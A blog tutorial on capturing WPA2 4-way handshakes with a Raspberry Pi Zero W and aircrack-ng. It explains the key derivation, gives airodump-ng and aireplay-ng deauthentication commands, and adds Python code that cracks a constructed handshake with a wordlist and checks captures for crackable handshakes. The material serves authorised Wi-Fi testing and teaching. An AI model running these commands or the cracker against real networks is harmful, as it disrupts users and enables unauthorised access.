In our last blog, we covered how to set up the Raspberry Pi Zero W and connect to it remotely using a mobile device: https://hackernoon.com/setting-up-pi-zero-for-pi-fi-hacking

Disclaimer: Everything shown in this blog was performed within legal boundaries and with full authorization from the network owner. This content is strictly for educational purposes. The author does not condone or take responsibility for any misuse of the techniques demonstrated.

Now that we have the power of Linux at our fingertips, let's look into capturing WPA handshakes. But before diving in, we'll take a brief look at...

The WPA Handshake (4-Way Handshake)

WPA/WPA2 is among the most widely used Wi-Fi security protocols. The core mechanism that establishes confidentiality and integrity for a WPA/WPA2 session is the 4-way handshake (WPA handshake): it confirms that the client and the access point hold the same secret and derives the keys that protect every data frame that follows.

As the name suggests, the 4-way handshake consists of four messages exchanged between the client (supplicant) and the access point (authenticator). It begins once the client has completed 802.11 authentication and association with the access point. In WPA2-Personal those two earlier steps do not involve the passphrase at all, which is why the 4-way handshake is where the shared secret is actually proven.

The 4-way handshake uses EAPOL (Extensible Authentication Protocol over LAN) key frames to carry its messages.
Four keys are involved. The two master keys exist before the handshake starts; the two temporal keys are produced by it:

PMK (Pairwise Master Key)
A shared secret that both sides hold before the handshake begins. In WPA2-Personal, the PMK is derived from the Pre-Shared Key (the passphrase) with the Password-Based Key Derivation Function 2 (PBKDF2-HMAC-SHA1), using the SSID as the salt, 4096 iterations and a 256-bit output. In WPA2-Enterprise, the PMK is taken from the Master Session Key (MSK) produced by the EAP exchange between the client and the authentication server, which the access point relays.

PTK (Pairwise Transient Key)
Unique to each client/access-point pair; its components protect all unicast traffic between the two. It is derived with a Pseudo-Random Function (PRF) over the following inputs:

PTK = PRF( PMK + ANonce + SNonce + MAC(Access Point) + MAC(Client) )

The standard sorts the two MAC addresses and the two nonces numerically before feeding them to the PRF, so both sides compute the same value no matter which address or nonce is "theirs". The first 128 bits of the PTK are the Key Confirmation Key (KCK), which computes the MIC on handshake messages; the next 128 bits are the Key Encryption Key (KEK), which wraps the GTK in message 3; the remainder is the temporal key that encrypts data frames.

GMK (Group Master Key)
Generated locally on the access point and never transmitted over the air.

GTK (Group Temporal Key)
Derived from the GMK and distributed to every client associated with the same access point. It encrypts multicast and broadcast traffic sent by the access point to clients.

How the 4-way handshake works

First EAPOL Message (AP → Client)
The access point sends the ANonce (Authenticator Nonce) to the client, which uses it to derive the PTK (Pairwise Transient Key).
The client already holds the PMK (Pairwise Master Key) and knows both MAC addresses; on receiving message 1 it generates its own SNonce (Supplicant Nonce) and now has every input it needs to compute the PTK.

Second EAPOL Message (Client → AP)
The client sends the SNonce together with a MIC (Message Integrity Code) to the access point, which can now derive the same PTK. The MIC is computed with the KCK portion of the PTK over the whole EAPOL frame, so a correct MIC proves to the access point that the client derived the same PTK, and therefore holds the same PMK, and that the SNonce was not tampered with in transit.

Third EAPOL Message (AP → Client)
The access point sends the GTK (Group Temporal Key) to the client, encrypted with the KEK portion of the PTK, together with the ANonce again and its own MIC, which proves to the client that the access point also holds the PMK.

Fourth EAPOL Message (Client → AP)
The client sends a final EAPOL message containing a MIC, acknowledging that both the PTK and the GTK have been installed. From this point on, data frames are encrypted.

An easy way to understand the 4-way handshake is to think of how humans build trust in a relationship. Each exchange is like sharing a piece of information that helps both people confirm who they are. Likewise, the access point and client exchange key material to confirm they share the same secret (the PMK) and can communicate securely. Once trust is established, secure communication begins, much like a private conversation between two individuals. However, there is a catch: anyone nearby can listen to that introduction.

The Flaw

Wireless communication is inherently exposed, so anyone within radio range can eavesdrop on the traffic.
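The derivations described above (PMK from the passphrase, PTK from the nonces and MAC addresses, MIC from the KCK) and what an eavesdropper who recorded them can do with them, as an added Python example. This is not code from the original post or from the aircrack-ng project; the "captured" message 2, the SSID, the MAC addresses and the nonces are all constructed in the file with a known passphrase, and the frame layout is a plain RSN EAPOL-Key frame with the RSN IE omitted from the key data, so the MIC sits at byte 81.

```python
"""Offline dictionary attack against a captured WPA2 4-way handshake.

Implements the derivations from the text: PMK (PBKDF2 over passphrase and SSID),
PTK (the 802.11 PRF over PMK, both MACs and both nonces) and the EAPOL-Key MIC
(HMAC-SHA1 with the KCK, truncated to 128 bits). The "captured" handshake below is
constructed in this file with a known passphrase; nothing here was sniffed.
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the 16-byte MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).

    Sorting makes both sides feed identical input whichever nonce or address is theirs.
    The first 16 bytes are the KCK (MIC key), the next 16 the KEK, the rest the temporal key."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, replay_counter: int, mic: bytes = bytes(16)) -> bytes:
    """EAPOL-Key message 2 (RSN descriptor; key info 0x010a = version 2, pairwise, MIC present)."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, replay_counter)   # descriptor, key info, key length, replay ctr
    body += snonce + bytes(16) + bytes(8) + bytes(8)             # SNonce, Key IV, Key RSC, Key ID
    body += mic + struct.pack(">H", 0)                            # MIC, key data length (RSN IE omitted here)
    return struct.pack(">BBH", 2, 3, len(body)) + body             # 802.1X header: version 2, type 3 = EAPOL-Key


def crack(ssid, ap_mac, client_mac, anonce, snonce, captured_msg2, candidates):
    """Return the candidate whose derived MIC matches the captured message-2 MIC, or None."""
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + bytes(16) + captured_msg2[MIC_OFFSET + 16:]
    for candidate in candidates:
        pmk = pmk_from_passphrase(candidate, ssid)                     # the slow step: 4096 HMAC iterations
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


# --- Constructed handshake, standing in for what airodump-ng would have written to the .cap ---
SSID = "HomeNet"
AP_MAC = bytes.fromhex("00112233aabb")
CLIENT_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))          # fixed instead of random so the example is reproducible
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "correct horse battery"


def supplicant_msg2(passphrase: str) -> bytes:
    """What the client sends as message 2: the frame built with a zeroed MIC, then the MIC filled in."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, 1, eapol_mic(kck, build_msg2(SNONCE, 1)))


CAPTURED_MSG2 = supplicant_msg2(REAL_PASSPHRASE)
WORDLIST = ["password", "12345678", "correct horse battery", "letmein99"]

if __name__ == "__main__":
    print("recovered passphrase:", crack(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))
```

Two things the code makes visible that the prose only states: the attacker never needs to send anything once the handshake is recorded, and the only cost per guess is one PBKDF2 run plus four HMACs, which is exactly what aircrack-ng and Hashcat parallelise. The PMK test vector from the 802.11 standard (passphrase "password", SSID "IEEE") is a quick way to confirm the PBKDF2 parameters are right before trusting any result.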
During the 4-way handshake, the values an attacker needs (the ANonce, the SNonce, both MAC addresses and the MIC) are sent in the clear, so a passive listener can capture all of them. The pre-shared key (passphrase) itself is never transmitted; it only serves, together with the SSID, to derive the PMK (Pairwise Master Key) through PBKDF2. But because the handshake supplies every other input, an attacker can take the capture offline and, for each password guess:

- derive a candidate PMK with PBKDF2 from the guess and the SSID;
- derive the PTK with the PRF, using the captured nonces and MAC addresses;
- compute the MIC over the captured EAPOL frame with the candidate KCK;
- compare it with the captured MIC.

If the computed MIC matches the captured MIC, the guess is the passphrase. Nothing is sent to the network during this phase, so the owner sees no sign of it; the cost is entirely the attacker's CPU/GPU time, and the 4096 PBKDF2 iterations are what keep each guess comparatively expensive. Because the SSID is part of the derivation, a PMK computed for one network name does not carry over to another, and the attacker needs the ESSID (from a beacon or probe response) alongside the handshake; airodump-ng records both.

Now that the 4-way handshake and the underlying weakness are clear, we can begin...

Capturing WPA Handshake

We'll be using aircrack-ng, a complete suite of tools for assessing Wi-Fi network security, to capture WPA handshakes.

Setting Up

- Ensure your wireless adapter supports monitor mode (and, for the optional deauthentication step later, packet injection).
- Connect it to the Pi Zero's data micro-USB port (labelled USB, not PWR IN) using an OTG cable.
- Connect to the Pi via SSH.
- Check the network interfaces:

ifconfig

You can also use ip a if ifconfig is unavailable.

You should see two wireless interfaces, such as wlan0 and wlan1. One belongs to the Pi's internal card and the other to your external adapter.
If you only see one interface, make sure the adapter is seated correctly and run:

lsusb

This lists the USB devices the Pi has detected and confirms whether the adapter is recognised at all. If it appears in lsusb but no second wlan interface shows up, the kernel has no driver for that chipset; dmesg will show what it tried to load.

Update system packages:

sudo apt update

Install aircrack-ng:

sudo apt install aircrack-ng

Kali and Parrot usually ship with aircrack-ng preinstalled, but there is no harm in running this.

Configuring monitor mode

Check the interfaces with airmon-ng:

sudo airmon-ng

The command displays each wireless interface alongside its driver and chipset.

Enable monitor mode with airmon-ng:

sudo airmon-ng start <interface>

With most drivers airmon-ng renames the interface (for example wlan1 becomes wlan1mon); use the name it prints in every command that follows. You will likely also see a message suggesting that you run:

sudo airmon-ng check kill

This stops processes that can interfere with monitor mode, such as NetworkManager and wpa_supplicant. Because it kills wpa_supplicant, it also drops the Pi's own Wi-Fi connection, and if our SSH session rides over that connection it will terminate with it. Either accept that and reconnect afterwards, or leave those processes running and put only the external adapter into monitor mode, accepting the risk that they occasionally reset its channel.

Capturing handshake

Dump all traffic:

sudo airodump-ng <interface>

The command shows a real-time list of detected access points and, below them, the connected clients (stations). Without a channel argument it hops across all channels, so any single network is only observed for a fraction of the time.
Before continuing, let us analyze the above output. The upper section shows data for access points:

- BSSID: MAC address of the access point.
- PWR: Signal level reported by the Wi-Fi adapter. It rises as you move closer to the AP or station; -1 means the driver does not report signal level.
- RXQ: Receive Quality, the percentage of packets (management and data frames) successfully received over the last 10 seconds. Only shown when airodump-ng is locked to a single channel.
- Beacons: Number of announcement packets sent by the access point.
- #Data: Number of captured data packets.
- #/s: Number of data packets per second measured over the last 10 seconds.
- CH: Channel number (taken from beacon packets).
- MB: Maximum speed supported by the access point.
- ENC: Encryption algorithm in use; OPN means no encryption.
- CIPHER: The cipher detected (CCMP, TKIP, WEP...).
- AUTH: The authentication protocol used (PSK for a pre-shared key, MGT for an authentication server).
- ESSID: The name of the network (SSID).

The lower section shows data for clients (stations):

- STATION: The MAC address of each associated station, or of stations searching for an AP to connect to. Clients not currently associated with an AP show a BSSID of "(not associated)".
- RATE: Station's receive rate, followed by transmit rate.
- LOST: The number of data packets lost over the last 10 seconds, based on sequence numbers.
- Packets: The number of data packets sent by the client.
- Notes: Additional information about the client, such as captured EAPOL or PMKID.
- Probe: The ESSIDs probed by the client; these are the networks the client is trying to connect to if it is not currently connected.

Next, copy the BSSID and channel (CH) of your target access point; you will need them in the next step.
Dump traffic from the target access point

For this, open a new terminal tab so you don't disrupt the ongoing airodump-ng session (click on the three dots on the tab and select Duplicate). Then run airodump-ng against the target:

sudo airodump-ng --bssid <bssid> -c <channel_number> -w <output> <interface>

- --bssid: MAC address of the target access point
- -c: channel of the target access point; this also stops channel hopping, so the adapter listens on that channel continuously
- -w: prefix for the capture files; airodump-ng writes <output>-01.cap (the pcap you will crack later) plus .csv and other summaries, and increments the number on each run

The command lists the access point and the clients (stations) connected to it. In our case there is only one client connected to the target.

Triggering the 4-way handshake (optional)

By default, capturing the WPA handshake is passive: we silently monitor Wi-Fi traffic without transmitting anything, which is stealthy but may mean waiting until a client reconnects on its own and performs the 4-way handshake.

To speed things up, we can force a client to disconnect with a deauthentication attack; the client then reconnects and performs a fresh 4-way handshake, which we capture. This step is active: the deauthentication frames are forged in the access point's name, are visible to any wireless IDS, and knock the victim off the network, so it only belongs in an authorised assessment.

For this, we use aireplay-ng to send deauth frames to the target. Open a new terminal (keeping the other two running) and run:

sudo aireplay-ng --deauth 10 -a <target_bssid> <interface>

- --deauth selects the deauthentication attack; -0 is the common short alias
- 10 is the number of deauthentication bursts to send (0 means keep sending until you stop it)
- -a: MAC address of the target access point
- <interface> is the monitor-mode interface, which must be on the target's channel; run it while the targeted airodump-ng session keeps the adapter locked there

Without a client address the deauthentication is broadcast, disconnecting every client of that access point. aireplay-ng sends the frames with reason code 7 (Class 3 frame received from non-associated station) by default.
You can target a specific client with the -c flag, which increases the chance of triggering a handshake when several clients are present and limits the disruption to that one device:

sudo aireplay-ng -0 10 -a <target_ap_mac> -c <client_mac> <interface>

Check for the WPA handshake

Return to the previous tab (running airodump-ng on the target access point). EAPOL in the Notes field of the client indicates that EAPOL-Key frames, that is, the 4-way handshake messages, have been captured for that client. Once a complete handshake has been seen, the top right of the airodump-ng output shows "WPA handshake: <bssid>"; the first tab (running airodump-ng across all channels) may show it too if it happened to be on the right channel at the time.

In a new terminal, verify that the captured pcap contains the WPA handshake using aircrack-ng:

sudo aircrack-ng <captured_file.cap>

Run without a wordlist, aircrack-ng only parses the capture: it lists the networks it found and, for each, how many usable handshakes it holds (for example "WPA (1 handshake)"). If the handshake is invalid or incomplete, it says "No valid WPA handshakes found." In that case, deauthenticate again and check that the adapter stayed on the target's channel; a handshake recorded while the adapter was still hopping is often missing message 2 or 3. Keep the whole .cap file for the next step: the Hashcat converter needs the EAPOL frames together with a beacon or probe response carrying the ESSID, since the SSID is an input to the PMK derivation.

In the next blog, we'll walk through cracking the WPA handshake using Hashcat.
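To see what the verification step above is actually checking, here is an added Python example that reads a capture of raw 802.11 frames (link type 105, the format airodump-ng writes), picks out the EAPOL-Key frames and reports, per access point and client, which of the four messages are present and whether the pair is enough for an offline attack (message 2 for the MIC plus an ANonce from message 1 or 3). This is not the aircrack-ng project's code; the message-number classification from the Key Information flags is the common heuristic, and the sample capture at the bottom, including the MAC addresses, nonces and flag values, is constructed in the file rather than recorded.

```python
"""Check an airodump-ng style capture for the 4-way handshake messages it contains.

Walks a classic pcap of raw 802.11 frames (link type 105), picks out unprotected data
frames carrying EAPOL-Key (EtherType 0x888E), classifies each as message 1-4 from its
Key Information flags, and reports per (BSSID, client) pair whether the capture holds
what an offline attack needs: message 2 (the MIC) plus an ANonce from message 1 or 3.
The sample capture at the bottom is constructed here, not recorded.
"""
import struct

LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"
KEY_INSTALL, KEY_ACK, KEY_MIC, KEY_SECURE = 0x0040, 0x0080, 0x0100, 0x0200


def message_number(key_info: int, key_data_len: int):
    """Map EAPOL-Key flags to the handshake message number (the usual heuristic; None if unclear)."""
    if key_info & KEY_ACK and not key_info & KEY_MIC:
        return 1                         # AP -> client, carries ANonce
    if key_info & KEY_ACK and key_info & KEY_MIC and key_info & KEY_INSTALL:
        return 3                         # AP -> client, ANonce again plus wrapped GTK
    if key_info & KEY_MIC and not key_info & KEY_ACK:
        return 2 if key_data_len else 4  # M2 carries the RSN IE; M4 has no key data
    return None


def parse_eapol_frames(pcap: bytes):
    """Yield (bssid, client, key_info, replay_counter, nonce, key_data_len) for each EAPOL-Key frame."""
    magic, = struct.unpack_from("<I", pcap, 0)
    linktype, = struct.unpack_from("<I", pcap, 20)
    if magic != 0xA1B2C3D4 or linktype != 105:
        raise ValueError("expected a little-endian pcap of raw 802.11 frames (link type 105)")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap, off)
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        fc0, fc1 = frame[0], frame[1]
        if fc0 & 0x0C != 0x08 or fc1 & 0x40:          # data frames only, skip Protected ones
            continue
        hdr = 24 + (2 if fc0 & 0x80 else 0)            # QoS data subtypes add a 2-byte QoS control field
        if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL:
            continue
        addr1, addr2 = frame[4:10], frame[10:16]
        bssid, client = (addr2, addr1) if fc1 & 0x02 else (addr1, addr2)   # FromDS vs ToDS
        e = hdr + 8
        if frame[e + 1] != 3 or frame[e + 4] not in (2, 254):  # EAPOL-Key with RSN or WPA descriptor
            continue
        key_info, = struct.unpack_from(">H", frame, e + 5)
        replay, = struct.unpack_from(">Q", frame, e + 9)
        nonce = frame[e + 17:e + 49]
        key_data_len, = struct.unpack_from(">H", frame, e + 97)
        yield bssid, client, key_info, replay, nonce, key_data_len


def handshake_status(pcap: bytes) -> dict:
    """Per (BSSID, client): which messages were seen and whether they suffice for an offline attack."""
    seen = {}
    for bssid, client, key_info, replay, nonce, kdl in parse_eapol_frames(pcap):
        n = message_number(key_info, kdl)
        if n is not None:
            seen.setdefault((bssid, client), {})[n] = (replay, nonce)
    return {pair: {"messages": sorted(m), "crackable": 2 in m and (1 in m or 3 in m)}
            for pair, m in seen.items()}


# --- Constructed capture: one complete handshake, one client that only got message 1 ---
def eapol_key_frame(from_ap, bssid, client, key_info, replay, nonce, key_data=b""):
    if from_ap:   # FromDS: addr1 = client (DA), addr2 = BSSID, addr3 = AP (SA)
        hdr = bytes([0x08, 0x02, 0, 0]) + client + bssid + bssid + bytes(2)
    else:         # ToDS: addr1 = BSSID, addr2 = client (SA), addr3 = AP (DA)
        hdr = bytes([0x08, 0x01, 0, 0]) + bssid + client + bssid + bytes(2)
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay) + nonce + bytes(32)   # IV, RSC, ID zeroed
            + bytes(16) + struct.pack(">H", len(key_data)) + key_data)           # MIC left zero here
    return hdr + LLC_SNAP_EAPOL + struct.pack(">BBH", 2, 3, len(body)) + body


def pcap_bytes(frames) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000, i, len(f), len(f)) + f
    return out


AP, CLIENT_A, CLIENT_B = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd"), bytes.fromhex("66778899eeff")
ANONCE, SNONCE, RSN_IE = bytes(range(32)), bytes(range(32, 64)), b"\x30\x14" + bytes(20)
SAMPLE_PCAP = pcap_bytes([
    bytes([0x80, 0x00]) + bytes(22) + bytes(12),                        # a beacon: management frame, skipped
    eapol_key_frame(True, AP, CLIENT_A, 0x008A, 1, ANONCE),             # M1
    eapol_key_frame(False, AP, CLIENT_A, 0x010A, 1, SNONCE, RSN_IE),    # M2
    eapol_key_frame(True, AP, CLIENT_A, 0x13CA, 2, ANONCE, bytes(56)),  # M3 (Install, Secure, encrypted key data)
    eapol_key_frame(False, AP, CLIENT_A, 0x030A, 2, bytes(32)),         # M4
    eapol_key_frame(True, AP, CLIENT_B, 0x008A, 1, ANONCE),             # second client: only M1 seen
])

if __name__ == "__main__":
    for (bssid, client), status in handshake_status(SAMPLE_PCAP).items():
        print(bssid.hex(":"), client.hex(":"), status)
```

Run against a real <output>-01.cap the same function tells you which client's handshake is incomplete before you spend GPU time on it; a pair with only message 1, like CLIENT_B here, is what you get when the client deauthenticated but the adapter missed the reply, and a second deauth round is the fix.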